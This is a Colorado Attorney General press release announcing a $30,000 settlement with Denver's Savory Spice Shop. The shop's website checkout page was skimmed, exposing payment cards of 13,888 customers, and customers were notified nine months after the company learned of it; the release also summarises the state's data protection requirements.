Attorney General Phil Weiser announces settlement in Savory Spice Shop data breach that impacted more than 13,000 Coloradans
July 22, 2022 (DENVER) – Attorney General Phil Weiser today announced a $30,000 data breach settlement with Savory Spice Shop, a company based in Denver that failed to safeguard the payment card information of 13,888 Colorado customers and waited months to notify them that their information had been compromised.
“When someone’s debit or credit card information is stolen, it can impact their savings, livelihood, and credit score, and cause significant stress as they work to secure their online identity and recover money that was stolen,” Weiser said. “With the continued rise in online shopping, it is critical that businesses secure their websites. We will continue to hold businesses accountable to following the law and protecting consumers’ information.”
Due in part to inadequate website security, Savory Spice was the victim of a data breach at an unknown time between April 2018 and September 2020 that allowed an attacker to skim customer payment card information from the website’s checkout page. An unknown criminal changed a file on the server that was hosting the shop’s website to send card information to a remote server at the same time the file sent the information to Savory Spice’s card processor.
In September 2020, when the payment card processor notified Savory Spice of the breach, the business found and deleted the malicious file on its server. However, the business failed to implement recommended security measures in time to thwart a second data breach, which occurred in March of 2021.
Although its online policy promised notification within 30 days of a breach, Savory Spice did not notify the 13,888 customers who were impacted by both breaches until July 23, 2021, nine months after the company learned of the breach.
In addition to the $30,000 payment to the state, Savory agreed to create and maintain an information security policy and incident response plan, to meet requirements in Colorado law and to hopefully prevent such a breach from happening in the future.
The Colorado Attorney General enforces Colorado data protection and data breach laws which require companies to maintain and follow appropriate policies and practices to protect consumer data. This requires inventorying the data a company collects and stores, developing a written information disposal policy, mediating identified risks of a company’s data collection and use practices, training employees on a company’s security practices and responding to data breaches that may occur. Depending on the nature of the company and the consumer data in its control, a company may need to develop a written information security policy and written incident response plan.
To learn about data protection requirements for businesses and government entities, or to find tips for impacted consumers, click here.